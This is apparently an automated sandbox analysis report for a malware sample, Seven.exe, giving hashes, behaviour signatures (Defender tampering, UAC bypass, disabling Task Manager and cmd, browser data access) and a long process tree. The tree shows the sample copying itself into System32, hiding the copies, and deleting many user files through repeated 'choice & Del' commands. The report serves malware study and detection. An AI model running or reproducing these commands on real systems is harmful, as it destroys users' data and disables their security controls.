Analysis
-
max time kernel
82s -
max time network
50s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
-
submitted
28-04-2024 02:56
General
-
Target
Seven.exe
-
Size
139KB
-
MD5
6503f847c3281ff85b304fc674b62580
-
SHA1
947536e0741c085f37557b7328b067ef97cb1a61
-
SHA256
afd7657f941024ef69ca34d1e61e640c5523b19b0fad4dcb1c9f1b01a6fa166f
-
SHA512
abc3b32a1cd7d0a60dd7354a9fcdff0bc37ec8a20bb2a8258353716d820f62d343c6ba9385ba893be0cca981bbb9ab4e189ccfeee6dd77cc0dc723e975532174
-
SSDEEP
3072:miS4omp03WQthI/9S3BZi08iRQ1G78IVn27bSfcJd8lto:miS4ompB9S3BZi0a1G78IVhcTct
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
UAC bypass 3 TTPs 2 IoCs
-
Blocks application from running via registry modification 1 IoCs
Adds application to list of disallowed applications.
-
Disables RegEdit via registry modification 1 IoCs
-
Disables Task Manager via registry modification
-
Disables cmd.exe use via registry modification 1 IoCs
-
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
-
Deletes itself 1 IoCs
-
Executes dropped EXE 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Drops desktop.ini file(s) 7 IoCs
-
Drops file in System32 directory 64 IoCs
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies registry class 22 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 2 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Seven.exe"C:\Users\Admin\AppData\Local\Temp\Seven.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Disables RegEdit via registry modification
- Disables cmd.exe use via registry modification
- Checks computer location settings
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.exe C:\Users\Admin\AppData\Local\Temp\SevenCopy.exe2⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.exe C:\Windows\System32\SevenCopy.exe2⤵
- Drops file in System32 directory
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C attrib +h C:\Windows\System32\SevenCopy.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h C:\Windows\System32\SevenCopy.exe3⤵
- Drops file in System32 directory
- Views/modifies file attributes
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.dll C:\Windows\System32\Seven.dll2⤵
- Drops file in System32 directory
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.runtimeconfig.json C:\Windows\System32\Seven.runtimeconfig.json2⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C attrib +h C:\Windows\System32\Seven.dll2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h C:\Windows\System32\Seven.dll3⤵
- Views/modifies file attributes
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C attrib +h C:\Windows\System32\Seven.runtimeconfig.json2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h C:\Windows\System32\Seven.runtimeconfig.json3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\SevenCopy.exe"C:\Users\Admin\AppData\Local\Temp\SevenCopy.exe"2⤵
- Checks computer location settings
- Deletes itself
- Executes dropped EXE
- Drops desktop.ini file(s)
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x64.log-MSI_vc_red.msi.txt"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x64.log.html"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x86.log-MSI_vc_red.msi.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x86.log.html"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x86_0_vcRuntimeMinimum_x86.log"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x86_1_vcRuntimeAdditional_x86.log"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x86_000_vcRuntimeMinimum_x86.log"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x86_001_vcRuntimeAdditional_x86.log"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x64_000_vcRuntimeMinimum_x64.log"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x64_001_vcRuntimeAdditional_x64.log"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x86_000_vcRuntimeMinimum_x86.log"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x86_001_vcRuntimeAdditional_x86.log"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\ClearStep.sql"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\Microsoft Edge.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\SyncBackup.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\SyncOpen.xls"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\UnregisterWatch.asp"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Are.docx"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\BackupExport.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Files.docx"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\ImportExpand.doc"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\MoveUnprotect.ppt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Opened.docx"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Recently.docx"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\ResumeExpand.pptx"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\SearchUninstall.csv"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\These.docx"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\UseConfirm.xlsx"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\CheckpointOut.jpg"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\ConvertExport.jpg"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\OutJoin.xml"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\RestartExport.docx"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\RestoreGroup.xml"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Links\Desktop.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Links\Downloads.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Music\GrantDeny.jpg"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Music\JoinUnregister.docx"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Music\PushUnlock.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Music\StepUnlock.doc"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\CompareInitialize.jpg"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\ConvertToClose.jpg"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\ExitBlock.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\My Wallpaper.jpg"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\SyncTrace.jpg"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\BackupFormat.html"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\ResumeSkip.csv"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\BroadcastMsg_1713510654.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI22D9.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI22FD.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI22D9.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI22FD.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\jawshtml.html"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\mapping.csv"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20240419_070613265.html"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.VisualElementsManifest.xml"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\msoia.exe_Rules.xml"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\office2016setup.exe_Rules.xml"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\onenote.exe_Rules.xml"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\winword.exe_Rules.xml"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\alertIcon.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppBlue.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppErrorBlue.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppErrorWhite.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppWhite.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AutoPlayOptIn.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ElevatedAppBlue.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ElevatedAppWhite.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Error.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ErrorPage.html"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMHeroToast.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMLockedFileToast.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMScanExclusionToast.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LoadingPage.html"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\OneDriveLogo.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaCritical.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaError.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaNearing.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\TestSharePage.html"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ThirdPartyNotices.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Warning.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-100.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-125.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-150.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-200.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-400.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-100.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-125.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
